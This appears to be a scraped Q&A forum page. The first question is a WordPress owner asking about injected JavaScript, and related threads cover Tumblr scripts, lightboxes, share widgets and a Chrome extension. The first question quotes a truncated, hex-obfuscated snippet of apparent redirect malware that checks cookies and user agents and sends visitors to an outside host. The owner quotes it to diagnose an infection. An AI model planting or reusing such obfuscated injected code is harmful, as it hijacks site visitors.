On a WP multisite some javascript code suddenly appeared in one of the pages. We don't think the client did this theirselves. When I google the code I find something very similar in a pastebin: https://pastebin.com/rUn6KnKe
it looks a bit like
var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego
Also I can find some other sites who have some code like this:
http://pcsarmacardio.com/
http://ddreadymixconcrete.com/photos/
We can easily delete it since it is in the editor, but does anyone know why this happens and how to prevent it ?
This is the indication that your wordpress site has been tried for hacking.
Remove that virus and take the site lock and make your wordpress updated and do the clean coding for same.
Remove unwanted code. secure 404.php of theme. Have the proper redirection..
use wp_nonce_field if you are taking the data from users.
Related
Today I found that my Wordpress website has encountered a problem. There are two unexpected letters at the top of the page which can be found in the screen shot below. I can't find where it is from the raw files of Wordpress. I don't know what happened. Could somebody help me please?
Heya :)You might be using some website screenshot plugin. Deactivate that plugin and then check the output. :)
i've had the same problem a while ago only instead of an n or two n's in your case i had a v just at the same place as yours is. What helped for me where the following steps.
Check all files, header.php, template files, etc.
Deactivate and activate your plug-ins. Maybe even try the Wordpress Re-install function from the updates page. Don't worry none of your contents like pages, posts, etc will be lost.
Check your widgets, sidebars and other content blocks from the back-end but also the corresponding template files.
If you have a decent editor like in my case PHPstorm make use of the show history function. It makes searching a lot easier.
I hope just like i had your problem will be solved after taking these steps.
Tumblr is just flooding the blogs with loads of JS and CSS files. I don't know if these files are required or just useful. Here's a list of them
The JS:
- tumblelog.js & pre_tumblelog.js -> looks like this is Tumblr JS API, but do we need it?
- cedexis.radar.js -> no idea what this does.
- rapid-3.18.1.js
The CSS:
fonts/gibson/stylesheet.css
And some images are also added to the page.
I searched a bit, but there is no way of stopping tumblr from doing this.
Is there any way we can stop Tumblr from doing so, if we don't need these files?
If we need the scripts, can you please elaborate why we need these?
No, sadly you can't do anything to stop Tumblr adding scripts / style sheets as they are added serverside.
For reference, fonts/gibson/stylesheet.css is added in relation to the theme fonts option: https://www.tumblr.com/docs/en/custom_themes#theme-options
You might be able to break some of the scripts (for example by adding window.addEventListener = 1), but it's probably not be worth the hassle.
You can remove any extra CSS or element via javascript but any downloads initiated by them can't be prevented.
I want to give my clients a few bits of copy/paste code so that a Lightbox shows on their site with an iframe showing a URL that I specify. This would be something similar to a support widget that comes up when you click on a button (ZenDesk, UserVoice, etc.).
I've been trying to write this on my own, but after attempting to include jQuery on page load plus the Lightbox CSS file, it's proven to be a little bit of a mess.
Could someone point me in the right direction as to how I can create an optimal bit of JS that can accomplish this? Perhaps a framework already exists so that I don't need to reinvent the wheel?
I found something reliable. Decided to use http://sandbox.scriptiny.com/tinybox2/
Please have a look at http://500px.com/photo/3977429?from=popular. Down in the right corner, theres a sharing box. It looks pretty similar to sharethis. But, afaik, sharethis doesnt have embed or submit for example, and im looking for those options. Does anyone know which plugin is used here? Thanks
On the page you linked to, they didn't use anything like sharethis or addthis - they rolled their own. Looking at the code, its clear that they went to facebook, got the facebook like button, embedded it - then wen to google, got the google plus button, etc... and made a grid of them.
You can stylize the sharethis buttons with css to pretty much any extent,
or you can add a grid like that of your own.
The available alternatives to sharethis.com are :
addthis.com
addtoany.com
socialmarker.com
I'm sure there a a lot more out there, but those seem to be the most popular.
If you want something custom like they have and want access to the buttons
here are some sets of images you may be able to use:
http://speckyboy.com/2009/01/26/30-amazingly-creative-social-bookmarks-icon-sets/
Inspecting the source leads me to believe that it is custom work. The images, links and such are placed in the HTML serverside. Only the stumbleupon is pulled from stumbleupon itself. But also not trough some third party service like sharethis.
I have a few questions that need answering. I am trying to create a Google Chrome extension and I need every page to be monitored for a keyboard action. I have added a content script that runs on the page load and when you click the keyboard shortcut an alert is shown.
What I want to do is instead of an alert have something like fancybox, thickbox, etc... however all of those are jquery plugins which adds a dependency to my js file. I tried launching the plugin before my js file but it still does not work.
I run the content script from the manifest.json file with
"content_scripts": [
{
"matches":["http://*/*", "https://*/*"],
"run_at":"document_start",
"js":["jquery.simplemodal.1.4.1.min.js", "shortcuts.js"]
}
],
I cannot execute an HTML page where the js is located I have to use a js file.
so what I want to know is if either there is a way to include the plugin without physically adding it to my file or if there is a way to call the js file which then just executes an HTML file or if there is another way of creating a popup screen like fancybox that is already included in js.
Another question I have is if there was a way to embed HTML into an alert box (this is a backup if I cannot figure out the above question)
and finally does anyone know of an execution command for x-webkit-speech? I want the command to start recording and somehow some people have used some commands (none of which answer my question) so someone somewhere knows a little more about this function then me. I would really appreciate help with this I am really close to finishing my program and these are my last holdups with these questions answered I will be able to release my extension. Please help where you can I have researched and researched everywhere all different ways of trying these things and none have worked.
edit:
You were correct (JHurrah) including the jquery actually solved the problem I really appreciate that. simple yet successful I just assumed the jquery provided was enough but I guess everyone knows what happens when you assume especially when programming.
NewTang I have already looked at that website however I will relook at it and see if I missed anything thanks for the help
yeah see I don't have that I have link edit and flag I looked all over and did not see an add comment button at all... :[
since simplemodal is a plugin it depends on jquery, try including jquery in your manifest before the other scripts.
"js":["jquery-1.5.2.min.js", "jquery.simplemodal.1.4.1.min.js", "shortcuts.js"]
I"m a little confused by your question, but I'll give it my best shot.
1) I think you're trying to ask: Can I use a content_script to inject HTML. The answer is yes, but only through Javascript. So, you could have something like:
//using jquery
$("body").append("Hi, I'm on the bottom of the page");
Your javascript would have to create or load the HTML that would get inserted into the page.
2) No, no HTML in an alert box. You're on the right track with using lightbox, thickbox, etc.
3) There's not many resources on x-webkit-speech, but maybe this can help you get going: http://nooshu.com/experimenting-with-webkit-form-speech-input